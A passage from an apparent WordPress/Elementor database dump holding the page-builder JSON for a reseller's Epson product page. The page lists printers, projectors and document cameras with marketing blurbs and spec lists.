first<\\/li><\\/ul><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L805 Printer\\u00a0<img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2055<img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson LightScene EV-105<\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p>Epson EB-1785W\\u00a0<img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1914d98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b5f42fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e3f8c24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d81ddc4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"890a1d6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INTERACTIVE\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c314a77\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fbcb210\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1897c27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-536Wi\\u00a0<img class=\\\"alignnone wp-image-2439\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-536Wi.png\\\" alt=\\\"\\\" width=\\\"242\\\" height=\\\"136\\\" \\/><\\/p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.<\\/p><ul><li>White and Colour Brightness at 3,400lm<\\/li><li>WXGA Resolution<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity<\\/li><li>Pen Interactivity<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a597712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d315157\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson 595Wi\\/585Wi\\/575Wi\\u00a0<img class=\\\"alignnone wp-image-2440\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-595Wi.png\\\" alt=\\\"\\\" width=\\\"276\\\" height=\\\"155\\\" \\/><\\/p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.<\\/p><ul><li>WXGA Resolution<\\/li><li>White and Colour Brightness at 3,300lm<\\/li><li>Multi-PC projection<\\/li><li>HDMI Connectivity x2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"de8ca10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"61ea7aa\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e5676d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"281e34f\",\"elType\":\"widget\",\"settings\":{\"title\":\"HIGH BRIGHTNESS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a49451\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f301a8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7e2436\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L1405UNL\\u00a0<img class=\\\"alignnone wp-image-2441\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/EB-L1405UNL.png\\\" alt=\\\"\\\" width=\\\"207\\\" height=\\\"117\\\" \\/><\\/p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000\\u00a0long lasting hours maintenance-free.<\\/p><ul><li>White and Colour Brightness at 8,000lm<\\/li><li>WUXGA (1920 x 1200)<\\/li><li>Edge-blending to create large panoramic images<\\/li><li>Curve and corner wall projection<\\/li><li>HDBaseT<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dd3bc89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6d9f7b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-G7400UNL\\u00a0<img class=\\\"alignnone wp-image-2442\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-G7400UNL.png\\\" alt=\\\"\\\" width=\\\"205\\\" height=\\\"116\\\" \\/><\\/p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fine\\u2122 and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projector\\u2019s astoundingly short throw ratio of 0.35*.<\\/p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.<\\/em><\\/p><ul><li>High Brightness<\\/li><li>Beyond Full HD Resolution<\\/li><li>Powered Lens<\\/li><li>Portrait Projection<\\/li><li>Flexible Installation<\\/li><li>Edge Blending<\\/li><li>Point Correction<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2860f60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abe0604\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-Z10000U\\u00a0<img class=\\\"alignnone wp-image-2443\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-Z10000U.png\\\" alt=\\\"\\\" width=\\\"208\\\" height=\\\"117\\\" \\/><\\/p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.<\\/p><ul><li>White and Colour Brightness at 10,000\\u00a0lm<\\/li><li>WUXGA resolution<\\/li><li>High Reliability and Durability<\\/li><li>Suitable for 24\\/7 usage<\\/li><li>Flexible projection angles and installations<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p>Document Camera ELPDC21\\u00a0<img class=\\\"alignnone wp-image-2444\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>To discover more, please click the button below or contact us to discuss your needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3949,2750,'_elementor_version','0.4'),(3959,2752,'_wp_page_template','template-fullwidth.php'),(3952,2751,'_wp_page_template','template-fullwidth.php'),(3953,2751,'_elementor_edit_mode','builder'),(3954,2751,'_elementor_template_type','post'),(3955,2751,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Enterprise WF-C17590\\u00a0<img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Pro WF-C5290\\u00a0<img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-100\\u00a0<img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-7711\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EcoTank L3150\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L120 Printer\\u00a0<img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson M1100 Printer\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson AcuLaser C9300N\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0Epson WorkForce AL-M320DN\\u00a0<img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 